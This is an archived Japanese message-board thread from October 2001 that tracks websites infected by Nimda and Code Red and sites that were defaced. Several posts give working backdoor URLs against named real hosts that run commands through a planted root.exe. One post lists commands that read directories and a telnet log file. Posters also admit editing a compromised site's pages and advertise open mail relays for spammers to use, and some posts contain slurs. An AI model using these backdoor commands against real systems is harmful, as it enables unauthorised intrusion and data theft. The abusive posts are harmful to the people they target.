>>137
わかんないけど、あのにフルアクセスだけど
何人か同時に入るとだめっぽい?
>>138
<!-- konohouga nagaiaida asoberu kana ? -->
を追加した人が入ってたからかな?

140 :名無しさん@お腹いっぱい。:01/10/05 23:22
むーん。
http://www.miruku.co.jp/usr/find/higa.htm

141 :名無しさん@お腹いっぱい。:01/10/05 23:24
>>140
ん。一応トップしか直してないよ(w

142 :名無しさん@お腹いっぱい。:01/10/05 23:26
>>140
つーか、これ・・。

143 : :01/10/05 23:51
誰?test.eml置いたの?
なんか足りないぞ(w

144 :名無しさん@お腹いっぱい。:01/10/06 00:14
かつての感染サイトだが、なんだこれ・・。

http://61.136.189.106/

145 :名無しさん@お腹いっぱい。:01/10/06 00:19
とはいえ・・。

http://61.136.189.106/scripts/root.exe?/c%20dir%20%63%3A%5C

146 :名無しさん@お腹いっぱい。:01/10/06 20:30

ftp://shop.tv-tokyo.co.jp/
http://shop.tv-tokyo.co.jp/

ni so no mo sushi gocho
translation: jak lykes yer rice and isnt givin it back, bitch!
sup methyle, viv, a0hax0rs

owned by kurszd

147 :何ですか、これ?:01/10/07 01:46
>>145
Win98SEにて実行したところ、プログラム開始エラー。
「ROOT.EXEファイルは欠陥エクスポートKERNEL32.DLL:GetVDMCurrentDirectoriesにリンクされています。」

148 : :01/10/07 02:15
>>147
Windows2000のCMD.EXEだからな。
そりゃ動かんわ(藁

149 :>:01/10/07 11:51
みるく www.miruku.co.jp
死んでるね。
誰か しゃとだうん 流した?
それとも 気づいてとめたか?

150 :名無しさん@お腹いっぱい。:01/10/08 13:03
>>149
http://www.miruku.co.jp
あ、ほんとだ、裏口しまってら・・。

でも、

http://www.miruku.co.jp/index.html

</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

<!-- sorosoro naosouyo... meiwakudayo... -->

<!-- いやホントになんとかしようぜ・・・ -->

<!-- Demo Maa shibaraku konomamade iika..-->

<!-- 応急処置しておいたけどちゃんと対処してね -->

<!-- konohouga nagaiaida asoberu kana ? -->

151 :名無しさん@お腹いっぱい。:01/10/08 13:28
>>146

今見たら、表紙はなおっていました。

http://shop.tv-tokyo.co.jp/
テレビ東京のロゴが出ます。

が、

ftp://shop.tv-tokyo.co.jp/

なおってねーよ!(--;

FTPサイトとしてやっていくんだろーか。

152 :第三者中継可能!使ってやってくれ!:01/10/08 17:54
mail2.pyramidweb.com

From :
pemf@msn.com
Reply-To : brooksfraser3722@excite.com
To :
u8ao@msn.com
Subject:Merge bills into 1 monthly payment! [dg58t]
Date:Sat, 6 Oct ***** MIME-Version: 1.0
Received: from [204.142.79.55] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: from alflv@msn.com ([216.12.96.66]) by pyramid03@pyramidweb.com
(Lotus Domino Release 5.0.3) with SMTP id 2001100623372968:909 ; Sat, 6 Oct 2001 23:37:29 -0400
From pemf@msn.com Sun, 07 Oct 2001 02:01:13 -0700
X-Mailer: WEBmail 2.70
X-MIMETrack: Itemize by SMTP Server on Pyramid03/Pyramid Consulting Services(Release 5.0.3 |March 21, 2000)
at 10/06/2001 11:37:30 PM,Serialize by Router on Pyramid01/Pyramid Consulting Services(Release 5.0.6a |January 17, 2001)
at 10/07/2001 05:16:40 AM,Serialize complete at 10/07/2001 05:16:40 AM
Message-ID: <OF4D3671E5.320E549B-ON85256ADE.0013E9A7@LocalDomain>

153 :名無しさん@お腹いっぱい。:01/10/08 21:59
mail2.pyramidweb.com

問題あり:不正な中継を受け付けます。

(204.142.79.60)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

154 :名無しさん@お腹いっぱい。:01/10/09 00:03
不正中継の情報はいらんです。
ヨソでやってくれ。

155 :>:01/10/09 00:14
ntserver.ittworks.co.jp
も7日にはやられていた。
ここ、ホームページビルダの裏技 300 とか
出版してる会社だが、
その前にハカやウイの裏技を研究しておけ。

156 :名無しさん@お腹いっぱい。:01/10/09 00:24
>>155

いまだ閉鎖中ですな・・。

157 :名無しさん@お腹いっぱい。:01/10/09 02:54
感染サイト
61.73.7.36 61.187.88.11

158 :ニンダ:01/10/09 17:22
Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

159 :名無しさん@お腹いっぱい。:01/10/09 23:16
そんな事より>>1よ、ちょいと聞いてくれよ。スレと全然関係ないんだけどさ。
このまえ、msn行ったんです。msn。
そしたらなんかNindaがめちゃくちゃいっぱいで見れないんです。
で、よく見たらなんかリンクがはってあって、Nindaの配付は終了しました〜、とか書いてあるんです。
もうね、アホかと。馬鹿かと。
お前らな、Ninda如きで毎日見ているmsnにわざわざ来てんじゃねーよ、ボケが。
Nindaだよ、Ninda。
なんかサーバ管理者とかもいるし。全社挙げてmsnか。おめでてーな。
よーし部長のパソコンも感染しちゃったぞ〜、とか言ってるの。もう見てらんない。
お前らな、ウイルスバスターやるからそのパソコン空けろと。
M$ってのはな、もっと殺伐としてるべきなんだよ。
サポートで電話した奴といつ喧嘩が始まってもおかしくない、
刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、昨日、やっと見れたかと思ったら、何か飛ばされて、MSN Explorerをご利用ください、とか書いてあるんです。
そこでまたぶち切れですよ。
あのな、MSN Explorerなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、MSN Explorer、だ。
お前は本当にMSN Explorerを使わせたいのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、MSN Explorerって作ってみただけちゃうんかと。
ブラウザ通の俺から言わせてもらえば今、ブラウザ通の間での最新流行はやっぱり、
Mozilla、これだね。
MozillaにMuliZilla。これが通の入れ方。
MuliZillaってのは機能が多めに入ってる。そん代わりバグも少し多め。これ。
で、それにMozilla 用コンテキストメニュー拡張。これ最強。
しかしこれを入れると、どこにバグがあるのか分からないという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前らド素人は、Intranet Explorerでも使ってなさいってこった。

160 :名無しさん@お腹いっぱい。:01/10/10 10:01
>>159
ニンダ(w

161 :第三者中継可能!使ってやってくれ!:01/10/10 14:26
From : ClickForMail click4mail@lists.em5000.com
To : click4mail@lists.em5000.com
Subject : Order Top Brands of Drugs Online and Save Big Time and Money! Date:Tue, 9 Oct 2001 21:43:07 PST
MIME-Version: 1.0
Received: from [63.146.120.152] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: by rmd with EM5000 id 303381055 for click4mail@lists.em5000.com
From 100153470496365-1046-hotmail.com Tue, 09 Oct 2001 21:44:17 -0700
X-RMD-Text: yes
X-Mailer: EM5000 [rmd.1.1.21.Sep 22 2001.21:48:09]
Message-ID: 12153a3f$416$3bc3d1db@em5000.com
X-RMD-Version: 1.1.21

From : RealBigDeal RealBigDeal@postmasterglobal.com
To : RealBigDeal@postmasterglobal.com
Subject : Better odds than Vegas up to $100 FREE
Date : 10 Oct 2001 09:54:29 -0000
Received: from [209.114.218.148] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (qmail 8574 invoked by uid 500); 10 Oct 2001 09:54:29 -0000
From admin@postmasterglobal.com Tue, 09 Oct 2001 14:53:31 -0700
Message-ID: 20011010095429.8571.qmail@postmasterglobal.com
X-Sender: postmasterglobal.com
X-Info: This service does not permit Unsolicited Commercial Email.
X-Info: To report abuse, contact abuse@postmasterglobal.com.
X-PMG-Recipient:
X-PMG-Msgid:

162 :名無しさん@お腹いっぱい。:01/10/10 15:31
東海大学海洋学部も感染

163 :名無しさん@お腹いっぱい。:01/10/10 21:10
>>161

いらねえ。っつーかヘッダ丸コピーウザイ。

164 :名無しさん@お腹いっぱい。:01/10/11 14:13
http://people.site.ne.jpより

http://www.apec.co.jp/scripts/root.exe?/c%20dir%20c:\


バックドアあいてるようなサイトでハックされたとかいわれてもね。

165 :名無しさん@お腹いっぱい。:01/10/11 17:01
>>164

このスレではおなじみの技ですな(w

166 :名無しさん@お腹いっぱい。:01/10/11 17:06
なんじゃここは。

ニムダ感染の照れ隠しか?

http://www.miyazaki-catv.ne.jp/~hiroshi/welcome8/

ソース

<p>シロヒラムシニ</p>

<p>あっ!見つかっちゃった。お願い見逃して〜</p>
</body>
</html>

167 :名無しさん@お腹いっぱい。:01/10/11 17:56
>>164

そうだねえ。

http://people.site.ne.jp/2001/2001.html

10.07 有限会社ハムスター
www.86star.co.jp (211.126.248.194)


http://people.site.ne.jp/mirror2/2001.10.07/www.86star.co.jp/index.html

ρ(^-^)をい
ftp://www.86star.co.jp/

168 :名無しさん@お腹いっぱい。:01/10/11 18:06
これに感染しても
オンラインウィルスチェックとかではひっかからないの?

169 :名無しさん@お腹いっぱい。:01/10/11 18:10
>>168 これってどれよ?

170 :名無しさん@お腹いっぱい。:01/10/11 18:52
>>168 >>169
あのにあどみんアクセスはウィルスでないだろう。

171 :名無しさん@お腹いっぱい。:01/10/11 19:54
>>170
ニムダの二次被害のようだ。

172 :名無しさん@お腹いっぱい。:01/10/11 19:54
やられちゃいました。

■流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。


173 :名無しさん@お腹いっぱい。:01/10/11 20:23
>>172
>セキュリティー専門家が、マイクロソフトの公開サイトのIPアドレス(数値)に
変更を加えて顧客サービスページのアドレスを探しあて、記録にアクセスする
方法を発見した。

ふーん。。。色々やってみるもんだね。
だから言うのよ。IEは、マイ糞オフィシャルのハクツールだって(w

174 :名無しさん@お腹いっぱい。:01/10/11 20:39
>>173
>IPアドレス(数値)に 変更を加えて

これってここのスレでいつもやってることやん(w
あかねちゃ〜ん(はあと

175 :名無しさん@お腹いっぱい。:01/10/12 02:08
これなに?

http://www.apec.co.jp/daigaku20010625.lzh

176 :名無しさん@お腹いっぱい。:01/10/12 02:34
>>175
掲示板発見(w

http://www.apec.co.jp/guest/guestbook.asp

177 :名無しさん@お腹いっぱい。:01/10/14 02:16
http://www.panasonic.tcp.ne.jp/

これ一体何よ?(><)おしえて!

178 :>:01/10/14 10:52
>177
サイト改竄の後始末ができてないんでは?

http://people.site.ne.jp/
を参照

179 ::01/10/14 15:35
http://www.apec.co.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+c:%5c
http://www.apec.co.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+c:%5cbackup
http://www.apec.co.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+c:%5cWINNT
http://www.apec.co.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+c:%5cusers%5ctelnet.log

180 :名無しさん@お腹いっぱい。:01/10/15 11:48
http://www.apec.co.jp/test.html

181 :名無しさん@お腹いっぱい。:01/10/17 17:52
ニムダの被害、いまだ・・。

http://www.d-link.co.jp/

ソースもみよ。

182 :ニムダくんさようなら:01/10/17 19:01
http://www.advaoptical.co.jp
なんか 9/20ごろ感染してサイト再開しないままだよ、

183 :名無しさん@お腹いっぱい。:01/10/17 23:23
http://210.119.234.245
ココ踏んだらNimdaをダウンロードしてしまった!
Whoisによると韓国の大学のサーバっぽい。

IP Address : 210.119.224.0-210.119.235.255
Network Name : DONGSHINU
Connect ISP Name : KORNET
Registration Date : 19970530

[ Organization Information ]
Orgnization ID : ORG5884
Org Name : DongShin University(DSU)
State : CHONNAM

184 :名無しさん@お腹いっぱい。:01/10/18 11:16
今日、ひっさしぶりにCodeRedのNパターンが飛んできた。
よく、2にもNimdaにも感染せずに。。。。。あっぱれ

185 :名無しさん@お腹いっぱい。:01/10/18 12:13
おっ直ってるぞ

http://www.apec.co.jp/

186 :名無しさん@お腹いっぱい。:01/10/18 12:17
潜伏してたのかねぇ。おれんとこにもきた。

187 :名無しさん@お腹いっぱい。:01/10/18 12:29
>>185
http://www.apec.co.jp/guest/guestbook.asp

>とりあえず、WEBサーバ入れ替えました。
>クラッカーの人がいろいろ書き込みをしてましたが、
>小さな会社ではサーバー1台入れ替えるのも大変なのよ・・・。
>時間ないし・・・。
>まあ、WEBサーバもちょっと早くなったんでOKか。

>やっと、いろいろ実験できる。

時間がないってか。サーバー管理もあんたの仕事だろ。それができないのならサーバーをたてる資格なし。

188 :名無しさん@お腹いっぱい。:01/10/20 17:21
ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除する英語版プログラムをリリース(マイクロソフト)(2001.10.18)

 マイクロソフト株式会社は、ドットを含まないIPアドレスを含むURLの処理など、IEに影響を及ぼす3つの脆弱性を排除するプログラムをリリースした。対象となるのは、IE 5.01SP2、IE 5.5SP2およびIE 6で、日本語版プログラムもダウンロード可能。

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051


189 :名無しさん@お腹いっぱい。:01/10/20 21:24
>>188
つーか
http://slashdot.jp/article.pl?sid=01/10/17/0425215&mode=thread&threshold=

190 :名無しさん@お腹いっぱい。:01/10/23 11:23
>>189

つーか>>188

IE 5.01SP2、IE 5.5SP2およびIE 6で、日本語版プログラムもダウンロード可能。

191 :名無しさん@お腹いっぱい。:01/10/23 11:33
見てない管理者

http://www.apec.co.jp/guest/guestbook.asp?page=1
http://www.apec.co.jp/guest/guestbook.asp?page=2
http://www.apec.co.jp/guest/guestbook.asp?page=3
http://www.apec.co.jp/guest/guestbook.asp?page=4

http://headlines.yahoo.co.jp/hl?a=20011022-00000002-vgb-sci

192 :ニムダくんさようなら:01/10/23 12:43
www.apec.co.jp
apec.co.jp
別のサーバだ。
両方にゲストブックがあるね。
いらない方閉じると発想がないのかな。。。

193 :名無しさん@お腹いっぱい。:01/10/23 19:33
http://mx31.tiki.ne.jp/~isao-o/profile.html

キー!

194 :名無しさん@お腹いっぱい。:01/10/23 22:23
おいおい、また閉鎖かよ?

http://www.hyundaijapan.co.jp/

195 :名無しさん@お腹いっぱい。:01/10/24 13:10
>>187

ここの管理者も偉くなったよ・・。
http://headlines.yahoo.co.jp/hl?a=20011022-00000002-vgb-sci

196 :名無しさん@お腹いっぱい。:01/10/24 13:23
>>195
ワラタ

197 :名無しさん@お腹いっぱい。:01/10/24 13:41
ちょそ。

http://210.93.58.106/

198 :名無しさん@お腹いっぱい。:01/10/24 21:48
>>144
\\61.136.189.106
入れるし…
一応、アカウント聞いては来るが…

199 :名無しさん@お腹いっぱい。:01/10/24 22:42
この板の住人のヴァカどもへ
  ハハハ
  ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ( ^∀^)<  あほか この低脳が 進入してみろカス
 ( つ ⊂ ) \_________
  .)  ) )
 (__)_)     (^∀^)ゲラゲラ ゲラゲラ シネヤザイニチ オマエラシネヤクソガ(w

200 :省吾:01/10/25 01:11
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051
を適用するとcookieの警告が英語で表示される。

<A HREF="mailto:abuse@mail.postmasterglobal.com"> abuse@mail.postmasterglobal.com </A>

<A HREF="mailto:RealBigDeal@mail.postmasterglobal.com"> RealBigDeal@mail.postmasterglobal.com </A>

今さら? CodeRed  Nimda
211.13.210.40
http://211.13.210.40/

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

Copyleft (C) 水泥棒菊池Mツトム県奥様濃ゆ軍西米良し村所1偏屈ババア菊池記念館在住村ヤク場役人が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来(いちき)日通りドライバーMツトム県@三原名誉会長9臭ダイワ運湯5老出身白熊桜島高利貸アイス本社労再無視

文責 スッポン放送汚れ穴ウンサーチャッキー恩田

201 : :01/10/25 01:13
テスト

202 : :01/10/25 01:15
もう一回テスト

203 :nFine:01/10/25 01:42
近畿大と沖電気もくらったそうです

204 :名無しさん@お腹いっぱい。:01/10/25 12:46
https://www.netsecurity.ne.jp/article/9/3108.html
っていうかさあ
ホスティング会社がこれででは泣くぞ。。
新種ならともかく、この時期にNimdaにやられるって。。。

205 :省吾広告屋:01/10/25 14:46
<A HREF="mailto:abuse@mail.postmasterglobal.com"> abuse@mail.postmasterglobal.com </A>
<A HREF="mailto:RealBigDeal@mail.postmasterglobal.com"> RealBigDeal@mail.postmasterglobal.com </A>

今さら? CodeRed  Nimda
211.13.210.40
http://211.13.210.40/

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

Copyleft (C) 水泥棒菊池Mツトム県奥様濃ゆ軍西米良し村所1偏屈ババア菊池記念館在住村ヤク場役人が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来(いちき)日通りドライバーMツトム県@三原名誉会長9臭ダイワ運湯5老出身白熊桜島高利貸アイス本社労再無視

文責 スッポン放送汚れ穴ウンサーチャッキー恩田

206 :名無しさん@お腹いっぱい。:01/10/25 15:51
>>187

ほんと、偉くなったよ・・。

https://www.netsecurity.ne.jp/article/1/3097.html

207 :名無しさん@お腹いっぱい。:01/10/26 09:41
>>205
なんでもいいが、もう少し簡潔にならないもんかね・・。いろんな意味で。

208 :名無しさん@お腹いっぱい。:01/10/26 10:28
ミサワホーム

http://www.misawa-hakodate.com/RealEstate4/data4/uindex.html

おおあたりぃ〜♪

209 :ニムダくんさようなら:01/10/26 10:50
http://www.misawa-hakodate.com/RealEstate4/data4/uindex.html

これアパッチなのに。。。。。。。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)